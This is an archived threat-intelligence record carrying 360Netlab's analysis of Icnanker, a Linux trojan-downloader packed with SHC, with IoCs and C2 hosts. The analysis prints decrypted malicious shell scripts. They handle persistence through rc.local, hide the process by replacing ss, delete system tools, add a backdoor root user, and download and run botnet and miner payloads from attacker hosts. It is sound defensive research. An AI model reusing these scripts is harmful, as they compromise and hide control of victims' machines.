{
	"id": "674f62b3-8bcd-4431-afb1-afdf75d28c1f",
	"created_at": "2026-04-06T02:11:21.239434Z",
	"updated_at": "2026-04-10T03:24:18.031536Z",
	"deleted_at": null,
	"sha1_hash": "5d6bd639fdc84dffc7d763a07d7508fe489f4c42",
	"title": "Icnanker, a Linux Trojan-Downloader Protected by SHC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 340156,
	"plain_text": "Icnanker, a Linux Trojan-Downloader Protected by SHC\r\nBy Alex.Turing\r\nPublished: 2020-03-23 · Archived: 2026-04-06 01:29:53 UTC\r\nBackground\r\nOn August 15, 2019, the 360Netlab Threat Detecting System flagged an unknown ELF sample (5790dedae465994d179c63782e51bac1) which generated Elknot Botnet related network traffic. We manually took a look and noticed that it is a Trojan-Downloader which utilizes the \"SHC (Shell script compiler)\" technique and propagates through weak SSH credentials. The author appeared to be an old player, Icnanker. Icnanker was exposed on the Internet in 2015 as a script programmer who has a high-profile personality and likes to leave his QQ number and name in his code. The sample, in our opinion, was not much new and therefore we did not bother to write anything.\r\nOn March 12, 2020, IntezerLab tweeted about an Icnanker variant (6abe83ee8481b5ce0894d837eabb41df). They did not give many details and we figured it is probably worth writing down a few interesting features that we observed.\r\nOverview\r\nIcnanker is the first Linux malware family we observed that uses SHC. Its name is derived from the author's ID \"by icnanker\" in the script.\r\nThe current Icnanker samples can be divided into 2 categories according to their functions:\r\nProtector\r\nProtector is used to protect samples from being deleted. It is currently used to protect the Mining service.\r\nDownloader\r\nDownloader is mainly used to facilitate DDoS and Mining attacks. Currently its samples include Elknot Botnet, Xor Botnet and XMRMiner. On Icnanker-related HFS servers, we can see that the current download volume is at 20,114, with an increment of about 500 per day.\r\nhttps://blog.netlab.360.com/icnanker-trojan-downloader-shc-en/\r\nPage 1 of 9\r\nThe main functions of Downloader are:\r\nPersistence\r\nHide itself\r\nDelete system commands\r\nAdd new users\r\nDownload and execute specific samples\r\nReverse analysis\r\nLet's take a look at the following two samples.\r\n187fa428ed44f006df0c8232be4a6e4e Miner Protector,\r\n5790dedae465994d179c63782e51bac1 Elknot Botnet Downloader.\r\nMD5: 5790dedae465994d179c63782e51bac1\r\nELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.24, BuildID[sha1]=8368ecf43c311327ed1b8e011f25b87ceef7f065, stripped\r\nPacker: No\r\nVerdict: Malicious, Downloader\r\nMD5: 187fa428ed44f006df0c8232be4a6e4e\r\nELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.24, stripped\r\nPacker: No\r\nVerdict: Malicious, Protector\r\nWe know that on the Windows platform there is a technology for packaging BAT scripts into executable files, called Bat2Exe. Similarly, on the Linux platform there is an open source \"SHC (Shell script compiler)\" that packs shell scripts into executable files. SHC uses the RC4 algorithm to encrypt the original script. The ELF file generated by it has very obvious characteristics: the RC4 decryption function is called a total of 14 times, and there are many unique strings. Security researchers can tell fairly easily whether an ELF is generated by SHC.\r\nAs mentioned above, we can use the RC4 algorithm to manually extract the original script. (Another option is to use UnSHc to directly decrypt the script.)\r\n[*] Extracting each args address and size for the 14 arc4() calls with address [0x8048f65]...\r\n[0] Working with var address at offset [0x80ed087] (0x2a bytes)\r\n[1] Working with var address at offset [0x80ed0df] (0x1 bytes)\r\n ...............\r\n[12] Working with var address at offset [0x80f1280] (0x13 bytes)\r\n[13] Working with var address at offset [0x80f12b1] (0x13 bytes)\r\n[*] Extracting password...\r\n[+] PWD address found : [0x80f12ed]\r\n[+] PWD size found : [0x100]\r\n[*] Executing [/tmp/kjGnQn] to decrypt [5790dedae465994d179c63782e51bac1]\r\n[*] Retrieving initial source code in [5790dedae465994d179c63782e51bac1.sh]\r\n[*] All done!\r\n ...............\r\n[*] Executing [/tmp/GRsVsP] to decrypt [187fa428ed44f006df0c8232be4a6e4e]\r\n[*] Retrieving initial source code in [187fa428ed44f006df0c8232be4a6e4e.sh]\r\n[*] All done!\r\nProtector (187fa428ed44f006df0c8232be4a6e4e.sh)\r\n#!/bin/bash\r\ncp -f /usr/bin/chattr /usr/bin/lockr\r\ncp -f /usr/bin/chattr /usr/bin/.locks\r\ncp -f /usr/bin/.locks /usr/bin/lockr\r\nchmod 777 /usr/bin/lockr\r\nchmod 777 /usr/bin/.locks\r\nlockr +i /usr/bin/lockr \u003e/dev/null 2\u003e\u00261\r\nlockr +i /usr/bin/.locks \u003e/dev/null 2\u003e\u00261\r\n.locks -i /usr/bin/lockr;chmod 777 /usr/bin/lockr\r\nlockr +i /usr/bin/lockr \u003e/dev/null 2\u003e\u00261\r\ncp -f /usr/bin/lsattr /usr/bin/lockrc\r\ncp -f /usr/bin/lsattr /usr/bin/.locksc\r\ncp -f /usr/bin/.locksc /usr/bin/lockrc\r\nchmod 777 /usr/bin/lockrc\r\nchmod 777 /usr/bin/.locksc\r\nlockr +i /usr/bin/lockrc \u003e/dev/null 2\u003e\u00261\r\nlockr +i /usr/bin/.locksc \u003e/dev/null 2\u003e\u00261\r\n.locks -i /usr/bin/lockrc;chmod 777 /usr/bin/lockrc\r\nlockr +i /usr/bin/lockrc \u003e/dev/null 2\u003e\u00261\r\nrm -rf /usr/bin/lsattr\r\nrm -rf /usr/bin/chattr\r\nlockr +a /var/spool/cron/crontabs/root\r\nlockr +i /var/spool/cron/crontabs/root\r\nlockr +a /var/spool/cron/root\r\nlockr +i /var/spool/cron/root\r\nlockr +i /usr/lib/.cache/\r\nlockr +i /usr/lib/.cache\r\nrm -f $0\r\nIn this script, we can clearly see that the system commands chattr and lsattr are renamed and deleted, the directory .cache, where the mining script is located, is protected, and the immutable attribute is enabled to prevent it from being deleted.\r\nDownloader (5790dedae465994d179c63782e51bac1.sh)\r\n －－－－－－－－－－－－from 5790dedae465994d179c63782e51bac1.sh－－－－－－－－－－\r\n ...............\r\n echo \"byicnanker 2228668564\" \u003e $Config\r\ntempfile=`cat $Config | awk '{print $1}'`\r\nfiletemp=\"/usr/bin/$tempfile\" #现马的路径 (path of the current trojan)\r\nfilename=`date +%s%N | md5sum | head -c 10`\r\nfilepath=\"/usr/bin/$filename\" #新马的路径 (path of the new trojan)\r\ntempbash=`cat $Config | awk '{print $2}'`\r\nbashtemp=\"/usr/bin/$tempbash\" #现脚本路径 (path of the current script)\r\nbashname=`date +%s%N | md5sum | head -c 10`\r\nbashpath=\"/usr/bin/$bashname\" #新脚本路径 (path of the new script)\r\n ...............\r\nThis section has typical Icnanker marks; we can clearly see the Icnanker logo, QQ number, Chinese annotations, etc. Since the script is in plain text, the functions are clear at a glance, and there are mainly 5 functions.\r\nPersistence, self-starting via rc.local.\r\n # by icnanker -----------------------------------------------\r\n Repeatstart=`cat /etc/rc.local | grep 'start'| wc -l`\r\n if [ $Repeatstart != 1 ];then\r\n lockr -i /etc/rc.local;sed -i '/start/d' /etc/rc.local\r\n fi\r\n if [ -z \"`cat /etc/rc.local | grep \"$bashtemp\"`\" ]; then\r\n if [ -z \"`cat /etc/rc.local | grep \"$exit0\"`\" ]; then\r\n lockr -i /etc/;lockr -i /etc/rc.local\r\n echo \"$bashpath start\" \u003e\u003e /etc/rc.local\r\n else\r\n lockr -i /etc/;lockr -i /etc/rc.local\r\n sed -i \"s|exit 0|$bashpath start|\" /etc/rc.local\r\n echo \"exit 0\"\u003e\u003e/etc/rc.local\r\n fi\r\n fi\r\nSelf-hiding, so that management tools such as ss, ps, netstat cannot detect the process and network connections related to the sample.\r\nif [ -f /bin/ss ];then\r\nif [ ! -f \"$iss\" ];then\r\nif [ ! -f \"$issbak\" ];then\r\nlockr -i /usr/bin/;mkdir /usr/bin/dpkgd/\r\ncp -f /bin/ss $issbak\r\ncp -f /bin/ss $iss\r\nelse\r\ncp -f $issbak $iss\r\nfi\r\nchmod 777 $iss;chmod 777 $issbak\r\nlockr +i $issbak \u003e/dev/null 2\u003e\u00261\r\nlockr +i $iss \u003e/dev/null 2\u003e\u00261\r\nelse\r\nif [ ! -f \"$issbak\" ];then\r\nlockr -i /usr/bin/;cp -f $iss $issbak\r\nlockr +i $issbak \u003e/dev/null 2\u003e\u00261\r\nfi\r\nif [ -z \"`cat /bin/ss | grep $Address`\" ]; then\r\nlockr -i /bin/;lockr -i /bin/ss\r\necho '#!/bin/sh' \u003e /bin/ss\r\necho 'iss|grep -v \"'$Address'\"' \u003e\u003e /bin/ss\r\necho 'exit' \u003e\u003e /bin/ss\r\nchmod 777 /bin/ss;lockr +i /bin/ss \u003e/dev/null 2\u003e\u00261\r\nfi\r\nfi\r\nfi\r\nDelete some system files to increase the difficulty of repair.\r\nlockr -i /usr/bin/;\r\nlockr -i /usr/bin/wget;\r\nrm -f /usr/bin/wget;\r\nlockr -i /usr/bin/chattr;\r\nrm -f /usr/bin/chattr\r\nAdd a new user (ntps) to facilitate subsequent control of the victim's machine.\r\n # by icnanker -----------------------------------------------\r\n if [ -z \"`cat /etc/passwd|grep \"ntps\"`\" ]; then\r\n lockr -i /etc/;lockr -i /etc/passwd #ntps\r\n echo 'ntps:x:0:1:ntps:/root:/bin/bash' \u003e\u003e /etc/passwd\r\n lockr -i /etc/;lockr +i /etc/passwd \u003e/dev/null 2\u003e\u00261\r\n fi\r\n if [ -z \"`cat /etc/shadow|grep \"ntps\"`\" ]; then\r\n lockr -i /etc/;lockr -i /etc/shadow #tianyong\r\n echo 'ntps:$6$J6RdL6Xh$udhpd5iErOxXyZSERCi0NOtoXE9J095xDRo4DJfCoTEsImcxype6iltDL8pTG7w/7Gbp9Ohrii9O.4NnxqG/h.:1\r\n lockr -i /etc/;lockr +i /etc/shadow \u003e/dev/null 2\u003e\u00261\r\n fi\r\nDownload and execute specific samples; here it downloads the Elknot Botnet.\r\n # by icnanker -----------------------------------------------\r\n iptable=`iptables -L INPUT | grep \"$Address\" | grep 'ACCEPT'`\r\n if [ -z \"$iptable\" ];then\r\n iptables -I INPUT -s $Address -j ACCEPT\r\n else\r\n iptables -D INPUT -s $Address -j DROP\r\n fi\r\n process=`ips -ef | grep \"$tempfile\" | grep -v \"grep\" | wc -l`\r\n if [ $process != 1 ];then\r\n if [ ! -f \"$filebak\" ];then\r\n lockr -i /usr/bin/;lockr -i /usr/bin/htrdpm;rm -f /usr/bin/htrdpm\r\n cd /usr/bin/;dget http[://hfs.ubtv.xyz:22345/htrdpm\r\n cd $path;mv -f /usr/bin/htrdpm $filepath\r\n else\r\n cp -f $filebak $filepath\r\n fi\r\n Runkillallconnect\r\n chmod 777 $filepath\r\n nohup $filepath \u003e/dev/null 2\u003e\u00261 \u0026\r\n fi\r\nAt this point, Icnanker will load itself when the system boots and secretly maintain continuous control of the victim. At the same time, Icnanker has a pretty flexible configuration: when migrating from one service to another, the author only needs to update the DNS settings in the scripts.\r\nTake Elknot and Miner as examples:\r\nelknot\r\nResolveIP=`nslookup [ddd.ubtv.xyz|grep \"Address: \"|awk '{print $2}'`\r\nif [ -z \"$ResolveIP\" ];then\r\nlockr -i /etc/;lockr -i /etc/resolv.conf\r\necho 'nameserver 114.114.114.114' \u003e /etc/resolv.conf\r\necho 'nameserver 8.8.8.8' \u003e\u003e /etc/resolv.conf\r\necho 'nameserver 8.8.4.4' \u003e\u003e /etc/resolv.conf\r\nlockr +i /etc/resolv.conf \u003e/dev/null 2\u003e\u00261\r\nservice network restart;sleep 1\r\nAddress=`nslookup ddd.ubtv.xyz|grep \"Address: \"|awk '{print $2}'`\r\nelse\r\nAddress=\"$ResolveIP\"\r\nfi\r\n dget http[://hfs.ubtv.xyz:22345/htrdpm\r\n-------------------------------------------VS----------------------------------------\r\nminer\r\nResolveIP=`nslookup p[ool.supportxmr.com|grep \"Address: \"|awk '{print $2}'`\r\nif [ -z \"$ResolveIP\" ];then\r\nlockr -i /etc/;lockr -i /etc/resolv.conf\r\necho 'nameserver 114.114.114.114' \u003e /etc/resolv.conf\r\necho 'nameserver 8.8.8.8' \u003e\u003e /etc/resolv.conf\r\necho 'nameserver 8.8.4.4' \u003e\u003e /etc/resolv.conf\r\nlockr +i /etc/resolv.conf \u003e/dev/null 2\u003e\u00261\r\nservice network restart;sleep 1\r\nAddress=`nslookup p[ool.supportxmr.com|grep \"Address: \"|awk '{print $2}'`\r\nelse\r\nAddress=\"$ResolveIP\"\r\nfi\r\n dget http[://xz.jave.xyz:22345/.xm\r\nHere is a list of the Downloaders and their services we have observed so far.\r\nfilename | md5 | payload type | payload url\r\n80 | 5790dedae465994d179c63782e51bac1 | elknot botnet | http[://hfs.ubtv.xyz:22345/htrdpm\r\n.ds1;.ds2 | 6abe83ee8481b5ce0894d837eabb41df | miner | http[://xz.jave.xyz:22345/.xm\r\n.ssh | 89cd1ebfa5757dca1286fd925e0762de | elknot botnet | http[://hfs.ubtv.xyz:22345/htrdpm\r\n19880 | d989e81c4eb23c1e701024ed26f55849 | elknot botnet | http[://hfs.ubtv.xyz:22345/htrdps\r\nIcnanker's distributed samples\r\nIcnanker's distributed samples are all stored on its HFS server, and from what we have seen so far, all samples are the typical botnet families: Elknot Botnet, Xor Botnet, and XMR mining service.\r\nElknot Botnet\r\nfilename | md5 | c2\r\nhtrdps | 5c90bfbae5c030da91c9054ecb3194b6 | ubt.ubtv.xyz:19880, jav.jave.xyz:6001\r\nkcompact0 | eec19f1639871b6e6356e7ee05db8a94 | sys.jave.xyz:1764, jav.jave.xyz:6001\r\nXor.DDoS Botnet\r\nfilename | md5 | c2\r\nss | 0764da93868218d6ae999ed7bd66a98e | 8uch.jave.xyz:3478, 8uc1.jave.xyz:1987, 8uc2.ubtv.xyz:2987\r\nMiner\r\nfilename | md5 | c2\r\nsh | 17ac3bd2753b900367cb9ee4068fe0c1\r\n.xm | 765a0899cb87400e8a27ab572f3cdd61\r\nSuggestions\r\nWe recommend that users watch for the clues we mentioned above and block the C2 on their networks. We also suggest that strong login credentials should always be enforced.\r\nReaders are always welcome to reach us on Twitter, or by email to netlab at 360 dot cn.\r\nIoC list\r\nSample MD5\r\n5790dedae465994d179c63782e51bac1\r\n6abe83ee8481b5ce0894d837eabb41df\r\n89cd1ebfa5757dca1286fd925e0762de\r\nd989e81c4eb23c1e701024ed26f55849\r\n5c90bfbae5c030da91c9054ecb3194b6\r\neec19f1639871b6e6356e7ee05db8a94\r\n0764da93868218d6ae999ed7bd66a98e\r\n17ac3bd2753b900367cb9ee4068fe0c1\r\n765a0899cb87400e8a27ab572f3cdd61\r\n187fa428ed44f006df0c8232be4a6e4e\r\nCC\r\nubt.ubtv.xyz:19880 #Elknot\r\nsys.jave.xyz:1764 #Elknot\r\njav.jave.xyz:6001 #Elknot\r\n8uch.jave.xyz:3478 #Xor.DDoS\r\n8uc1.jave.xyz:1987 #Xor.DDoS\r\n8uc2.ubtv.xyz:2987 #Xor.DDoS\r\nxz.jave.xyz:22345 #Icnanker HFS\r\nSource: https://blog.netlab.360.com/icnanker-trojan-downloader-shc-en/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.netlab.360.com/icnanker-trojan-downloader-shc-en/"
	],
	"report_names": [
		"icnanker-trojan-downloader-shc-en"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775441481,
	"ts_updated_at": 1775791458,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5d6bd639fdc84dffc7d763a07d7508fe489f4c42.pdf",
		"text": "https://archive.orkl.eu/5d6bd639fdc84dffc7d763a07d7508fe489f4c42.txt",
		"img": "https://archive.orkl.eu/5d6bd639fdc84dffc7d763a07d7508fe489f4c42.jpg"
	}
}